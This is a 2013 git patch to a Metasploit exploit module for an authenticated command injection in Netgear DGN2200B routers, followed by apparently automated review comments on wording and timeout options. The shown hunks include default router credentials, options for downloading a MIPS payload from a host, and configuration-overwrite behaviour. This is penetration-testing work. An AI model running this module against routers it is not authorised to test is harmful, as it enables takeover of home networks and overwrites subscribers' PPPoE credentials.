From 19a158dce9ffbe35976201c977cfaddccc13ff1e Mon Sep 17 00:00:00 2001
From: jvazquez-r7
Date: Fri, 19 Apr 2013 15:50:13 -0500
Subject: [PATCH] Do final cleanup for netgear_dgn2200b_pppoe_exec
---
 .../linux/http/netgear_dgn2200b_pppoe_exec.rb | 22 +++++++++----------
 1 file changed, 11 insertions(+), 11 deletions(-)
diff --git a/modules/exploits/linux/http/netgear_dgn2200b_pppoe_exec.rb b/modules/exploits/linux/http/netgear_dgn2200b_pppoe_exec.rb
index a58b819dbc..307d656365 100644
--- a/modules/exploits/linux/http/netgear_dgn2200b_pppoe_exec.rb
+++ b/modules/exploits/linux/http/netgear_dgn2200b_pppoe_exec.rb
@@ -19,13 +19,13 @@ class Metasploit3 < Msf::Exploit::Remote
     super(update_info(info,
       'Name' => 'Netgear DGN2200B pppoe.cgi Remote Command Execution',
       'Description' => %q{
-        Some Netgear Routers are vulnerable to an authenticated OS command injection.
-        Default credentials for the web interface are admin/admin or admin/password.
-        Since it is a blind os command injection vulnerability, there is no output for the
-        executed command when using the cmd generic payload. A ping command against a
-        controlled system could be used for testing purposes.
-
-        WARNING: We overwrite parts of the PPPOE configuration! Backup it prior using this module!
+        Some Netgear Routers are vulnerable to an authenticated OS command injection
+        on their web interface. Default credentials for the web interface are admin/admin
+        or admin/password. Since it is a blind os command injection vulnerability, there
+        is no output for the executed command when using the cmd generic payload. A ping
+        command against a controlled system could be used for testing purposes. This module
+        overwrites parts of the PPOE configuration, while the module tries to restore it
+        after exploitation configuration backup is recommended.
       },
       'Author' =>
         [
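Review bot: The new description misspells the protocol as `PPOE` where the option strings and the `pppoe_username` check elsewhere in this file use PPPoE, and its last sentence runs two clauses together ("tries to restore it after exploitation configuration backup is recommended"), so the warning that the removed text carried in capitals is now hard to parse. Because the settings this module rewrites include the PPPoE username the module itself checks for in the downloaded configuration (presumably the ISP login for the WAN link), the caveat deserves its own sentences: `This module overwrites part of the device's PPPoE configuration, including the PPPoE credentials. It attempts to restore the original configuration afterwards, but that restore is best-effort, so back up the configuration before running the module.` The lowercase `os command injection` should also read `OS command injection` as in the sentence before it. The `update_info` call continues outside this hunk.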
@@ -71,7 +71,8 @@ class Metasploit3 < Msf::Exploit::Remote
         OptString.new('PASSWORD', [ true, 'The password for the specified username', 'password' ]),
         OptAddress.new('DOWNHOST', [ false, 'An alternative host to request the MIPS payload from' ]),
         OptString.new('DOWNFILE', [ false, 'Filename to download, (default: random)' ]),
-        OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the ELF payload request', 45])
+        OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the ELF payload request', 60]),
+        OptInt.new('RELOAD_CONF_DELAY', [true, 'Time to wait to allow the remote device to load configuration', 45])
       ], self.class)
   end
@@ -96,7 +97,7 @@ class Metasploit3 < Msf::Exploit::Remote
     end
     if [200, 301, 302].include?(res.code)
       if res.body =~ /pppoe_username/
-        print_good("#{rhost}:#{rport} - Successful downloaded the configuration")
+        print_good("#{rhost}:#{rport} - Successfully downloaded the configuration")
       else
         fail_with(Exploit::Failure::NoAccess, "#{rhost}:#{rport} - Download of the original configuration not possible or the device uses a configuration which is not supported")
       end
@@ -157,7 +158,6 @@ class Metasploit3 < Msf::Exploit::Remote
     #&wan_hwaddr_def=84%3A1B%3A5E%3A01%3AE7%3A05&wan_hwaddr2=84%3A1B%3A5E%3A01%3AE7%3A05
     #&wan_hwaddr_pc=5C%3A26%3A0A%3A2B%3AF0%3A3F&wan_nat=1&opendns_parental_ctrl=0
     #&pppoe_flet_sel=&pppoe_flet_type=&pppoe_temp=&opendns_parental_ctrl=0
-
     res = send_request_cgi(
       {
         'uri' => uri,
@@ -222,7 +222,7 @@ class Metasploit3 < Msf::Exploit::Remote
     uri = '/pppoe.cgi'
     user = datastore['USERNAME']
     pass = datastore['PASSWORD']
-    @timeout = datastore['HTTP_DELAY']
+    @timeout = datastore['RELOAD_CONF_DELAY']
     #
     # testing Login
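Review bot: Neither OptInt description in the register_options hunk names a unit, so an operator cannot tell whether the new `RELOAD_CONF_DELAY` default of 45 (or the HTTP_DELAY default now raised to 60) is seconds or milliseconds; the strings should read `'Time in seconds to wait for the remote device to reload its configuration'` and `'Time in seconds the HTTP server waits for the ELF payload request'`. The HTTP_DELAY default changes from 45 to 60 with no rationale in the commit message, and a short note in the option text or the description would help anyone tuning it against a slow device. OptInt accepts zero and negative values, and since the later hunk assigns `RELOAD_CONF_DELAY` to `@timeout` (its use is outside this view), a guard in the exploit method such as `fail_with(Exploit::Failure::BadConfig, "#{rhost}:#{rport} - RELOAD_CONF_DELAY must be positive") unless datastore['RELOAD_CONF_DELAY'] > 0` would reject a bad setting before the configuration is rewritten, matching the `fail_with` style the module already uses. The `register_options` call starts before this hunk.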